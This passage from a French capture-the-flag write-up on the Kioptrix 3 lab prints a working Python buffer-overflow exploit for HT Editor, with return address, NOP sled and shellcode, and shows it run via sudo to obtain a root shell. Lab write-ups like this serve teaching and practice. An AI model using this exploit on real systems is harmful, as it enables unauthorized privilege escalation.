x3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq"
# 4091 --> root@bt:/opt/metasploit/msf3/tools# ruby pattern_offset.rb 0x34674633
# 0x34674633 --> ht Editor overflow
bufferoverflow="\x41"*4091
eip="\xc5\xbe\x11\x08"
nops="\x90"*50
shellcode=("\x89\xe3\xda\xd4\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x62\x4a\x56\x6b\x62\x78\x5a\x39\x33\x62"
"\x63\x56\x32\x48\x76\x4d\x31\x73\x6c\x49\x59\x77\x32\x48"
"\x46\x4f\x34\x33\x51\x78\x75\x50\x32\x48\x36\x4f\x51\x72"
"\x35\x39\x32\x4e\x4c\x49\x68\x63\x31\x42\x38\x68\x56\x6a"
"\x55\x50\x53\x30\x73\x30\x54\x6f\x71\x72\x42\x49\x52\x4e"
"\x36\x4f\x45\x32\x50\x61\x63\x43\x32\x48\x67\x70\x43\x67"
"\x56\x33\x6d\x59\x58\x61\x7a\x6d\x6d\x50\x41\x41")
print (bufferoverflow+eip+nops+shellcode)
Cet exploit est vraiment bien fait, on trouve même la façon dont il a été créé. Pour le simple exploit la première partie liée au pattern est inutile. Maintenant exploitons ceci :
loneferret@Kioptrix3:~$ sudo ht $(python expl.py)
Normalement HT editor s’affiche mais glitch. Et on va pouvoir vérifier notre accès root :
root@Kioptrix3:/home/loneferret# whoami
root
root@Kioptrix3:/home/loneferret#
Nous sommes root ! Mais là encore ce n’est pas idéal car ce dernier semble en désordre, comme une mauvaise gestion des sauts de lignes…
display term on stderr
-s output TERM set command
-V print curses-version
-w set window-size
root@Kioptrix3:/home/loneferret# 8572.c CompanyPolicy.README LinEnum.sh checksec.sh echo expl expl.pl expl.py
root@Kioptrix3:/home/loneferret# TERM environment variable not set.
root@Kioptrix3:/home/loneferret# TERM environment variable not set.
On va corriger ceci :
root@Kioptrix3:/home/loneferret# reset
reset: unknown terminal type unknown
Terminal type? dumb
Notre challenge est officiellement terminé !
Written on April 16, 2018 by
Retour